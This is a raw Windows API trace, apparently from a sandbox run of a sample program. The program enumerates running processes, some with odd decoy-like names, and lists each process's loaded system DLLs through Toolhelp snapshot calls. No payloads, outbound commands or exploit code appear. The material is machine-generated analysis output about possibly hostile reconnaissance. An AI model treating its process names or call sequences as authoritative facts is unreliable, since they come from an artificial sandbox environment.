	[0105.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.921] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0105.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0105.922] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.923] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.924] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.925] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.926] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.926] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0105.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0105.927] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0105.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0105.928] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.929] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.930] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.931] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 0
	[0105.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 27
	[0105.945] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inserted_field.exe")) returned 1
	[0105.946] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xee0) returned 0x850
	[0105.953] Module32FirstW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.954] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.955] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.955] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.956] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.957] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.958] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.958] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.959] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.960] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.961] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.961] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.962] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.963] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.964] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.965] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.965] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.968] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.969] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 0
	[0105.970] Module32FirstW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Analysis Services\\inserted_field.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Analysis Services\\inserted_field.exe", lpUsedDefaultChar=0x0) returned 64
	[0105.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 19
	[0105.971] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.971] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.972] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0105.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0105.973] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.974] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.975] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.976] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0105.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0105.976] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.977] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.978] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.979] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.980] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.996] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0105.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0105.997] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0105.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0105.997] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0105.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.998] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0106.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.002] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 1
	[0106.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.003] Module32NextW (hSnapshot=0x850, lpme=0x20af280) returned 0
	[0106.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 19
	[0106.004] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="semi bay.exe")) returned 1
	[0106.005] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xef4) returned 0x854
	[0106.013] Module32FirstW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.014] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.015] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.015] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.016] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.017] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.018] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.019] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.019] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.020] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.021] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.022] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.022] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.023] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.024] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.025] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.026] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.026] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.027] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 0
	[0106.028] Module32FirstW (hSnapshot=0x854, lpme=0x20af280) returned 1
